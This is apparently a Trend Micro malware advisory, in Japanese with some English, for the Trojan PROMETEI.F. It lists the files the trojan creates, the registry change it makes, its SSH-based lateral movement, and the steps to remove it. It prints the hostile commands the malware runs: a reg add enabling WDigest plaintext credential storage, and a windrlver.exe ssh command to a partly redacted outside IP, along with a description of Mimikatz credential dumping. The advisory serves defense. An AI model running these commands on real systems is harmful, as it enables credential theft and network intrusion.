Trend Micro Security

Trojan.Win32.PROMETEI.F

2023年2月23日
 解析者: Carlos Villegas Madrid   

 別名:

Trojan.Win32.Agent (IKARUS)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:


  • マルウェアタイプ: トロイの木馬型
  • 破壊活動の有無: なし
  • 暗号化:  
  • 感染報告の有無: はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。


  詳細

ファイルサイズ 310,784 bytes
タイプ EXE
メモリ常駐 なし
発見日 2023年2月16日
ペイロード ファイルの削除, ファイルの作成

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • %Windows%\dell\{IP Address}.cpass → contains encoded credentials
  • %Windows%\dell\net{Ip Address}.map

(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

マルウェアは、以下のプロセスを追加します。

  • "%System%\cmd.exe" /C reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /f /t REG_DWORD /d 1
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /f /t REG_DWORD /d 1
  • "%System%\cmd.exe" /c del *.cpass
  • "%Windows%\dell\rdpciip.exe" scan
  • "%Windows%\dell\windrlver.exe" ssh {IP Address}:{Port} "%Windows%\dell\{IP Address}" {BLOCKED}.{BLOCKED}.123.34 HV

他のシステム変更

マルウェアは、以下のファイルを削除します。

  • %Windows%\dell\{Ip Address}.cpass

(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)

マルウェアは、以下のレジストリ値を変更します。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
Control\SecurityProviders\WDigest value
UseLogonCredential = 1

その他

マルウェアは、以下を実行します。

  • It must be executed on a specific directory in order to continue to its malicious routine.
  • It has the following capability:
    • If executed with "scan" as a commandline parameter, It will scan the for any available remote server.
      • Retrieved remote servers will be saved as %Windows%\dell\net{IP address}.map
    • It executes windrlver.exe detected as → Trojan.Win32.PROMETEI.E
      • It leverages windlver.exe to spread laterally by trying to gain login access on remote servers.
    • Execute "miWalk.exe" detected as → HackTool.Win32.Mimikatz.CNGH
      • If executed, it will drop %Windows%\dell\slldata2.dll which contains extracted user machine credentials.
    • It executes windrlver.exe and will try to establish a secure shell connection on targeted IP address using port 22.
      • "%Windows%\dell\windrlver.exe" ssh {IP address}:22 "%Windows%\dell\{IP address}" {BLOCKED}.{BLOCKED}.123.34 HV

<補足>
インストール

マルウェアは、以下のファイルを作成します。

  • %Windows%\dell\{IPアドレス}.cpass → エンコードされた認証情報を含む
  • %Windows%\dell\net{IPアドレス}.map

他のシステム変更

マルウェアは、以下のファイルを削除します。

  • %Windows%\dell\{IPアドレス}.cpass

その他

マルウェアは、以下を実行します。

  • マルウェアが自身の不正活動を続行するためには、特定のディレクトリ上で実行される必要があります。
  • マルウェアは、以下の機能を備えています。
    • コマンドラインパラメータとして「scan」を指定して実行すると、マルウェアは、利用可能なリモートサーバをスキャンします。
      • 取得したリモートサーバは、%Windows%\dell\net{IPアドレス}.mapとして保存されます。
    • マルウェアは、「windrlver.exe」を実行します。 → 「Trojan.Win32.PROMETEI.E」として検出
      • マルウェアは、windlver.exeを用いてリモートサーバへのログインを試行し不正にアクセスすることで拡散します。
    • マルウェアは、「miWalk.exe」を実行します → 「HackTool.Win32.Mimikatz.CNGH」として検出
      • 「miWalk.exe」が実行されると、マルウェアは、コンピュータから抽出した認証情報を含む「%Windows%\dell\slldata2.dll」を作成します。
    • マルウェアは、Windrlver.exeを実行し、ポート番号22を用いて対象のIPアドレス上でSSH接続の確立を試みます。
      • "%Windows%\dell\windrlver.exe" ssh {IPアドレス}:22 "%Windows%\dell\{IPアドレス}" {BLOCKED}.{BLOCKED}.123.34 HV


      対応方法

    対応検索エンジン: 9.800
    初回 VSAPI パターンバージョン 18.272.04
    初回 VSAPI パターンリリース日 2023年2月22日
    VSAPI OPR パターンバージョン 18.273.00
    VSAPI OPR パターンリリース日 2023年2月23日

    手順 1

    トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。

      • TROJ.Win32.TRX.XXPE50FFF065

    手順 2

    Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

    手順 3

    このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

    手順 4

    変更されたレジストリ値を修正します。

    [ 詳細 ]

    警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
    事前に意図的に対象の設定を変更していた場合は、意図するオリジナルの設定に戻してください。変更する値が分からない場合は、システム管理者にお尋ねいただき、レジストリの編集はお客様の責任として行なって頂くようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
    レジストリの編集前にこちらをご参照ください。

     
    • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest
      • UseLogonCredential = 1

    手順 5

    以下のファイルを検索し削除します。

    [ 詳細 ]
    コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。  
    • %Windows%\dell\{Ip Address}.cpass
    • %Windows%\dell\net{Ip Address}.map
  • Windows 2000、XP および Server 2003 の場合:

    1. [スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
    2. [ファイル名のすべてまたは一部]に以下のファイル名を入力してください。
       
      • %Windows%\dell\{Ip Address}.cpass
      • %Windows%\dell\net{Ip Address}.map
    3. [探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
    4. 検索が終了したら、ファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
      註:ファイル名の入力欄のタイトルは、Windowsのバージョンによって異なります。(例:ファイルやフォルダ名の検索の場合やファイル名のすべてまたは一部での検索)

  • Windows Vista、7、Server 2008、8、8.1、10 および Server 2012 の場合:

    1. Windowsエクスプローラ画面を開きます。
      • Windows Vista、7 および Server 2008 の場合:
        • [スタート]-[コンピューター]を選択します。
      • Windows 8、8.1、10 および Server 2012 の場合:
        • 画面の左下隅を右クリックし、[エクスプローラー]を選択します。
    2. [コンピューターの検索]に、以下を入力します。
       
      • %Windows%\dell\{Ip Address}.cpass
      • %Windows%\dell\net{Ip Address}.map
    3. ファイルが表示されたら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
      註:Windows 7 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 6

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Win32.PROMETEI.F」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください